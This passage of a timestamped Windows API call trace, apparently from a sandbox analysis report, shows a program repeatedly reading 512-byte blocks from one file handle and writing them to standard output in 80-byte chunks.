[0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] GetFileType (hFile=0x50) returned 0x1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] GetFileType (hFile=0x50) returned 0x1 [0149.827] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.827] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] GetFileType (hFile=0x50) returned 0x1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] GetFileType (hFile=0x50) returned 0x1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] GetFileType (hFile=0x50) returned 0x1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] GetFileType (hFile=0x50) returned 0x1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.828] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.828] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.828] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.828] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.829] GetFileType (hFile=0x50) returned 0x1 [0149.829] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] GetFileType (hFile=0x50) returned 0x1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.830] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.830] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] GetFileType (hFile=0x50) returned 0x1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] GetFileType (hFile=0x50) returned 0x1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] GetFileType (hFile=0x50) returned 0x1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] GetFileType (hFile=0x50) returned 0x1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.830] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.830] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] GetFileType (hFile=0x50) returned 0x1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] GetFileType (hFile=0x50) returned 0x1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] GetFileType (hFile=0x50) returned 0x1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] GetFileType (hFile=0x50) returned 0x1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.831] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.831] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.831] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.831] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.832] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.832] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.833] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.833] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.833] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.834] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.834] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.834] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.835] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.835] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.835] GetFileType (hFile=0x50) returned 0x1 [0149.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed2c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aed7c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aedcc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aedcc*, lpNumberOfBytesWritten=0x2addd0*=0x20, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.836] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addbc | out: lpNewFilePointer=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=4) returned 0x58 [0149.836] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aebec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aec3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec3c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] WriteFile (in: hFile=0x50, lpBuffer=0x2aec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aec8c*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.836] GetFileType (hFile=0x50) returned 0x1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] WriteFile (in: hFile=0x50, lpBuffer=0x2aecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addd0, lpOverlapped=0x0 | out: lpBuffer=0x2aecdc*, lpNumberOfBytesWritten=0x2addd0*=0x50, lpOverlapped=0x0) returned 1 [0149.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.837] GetFileType 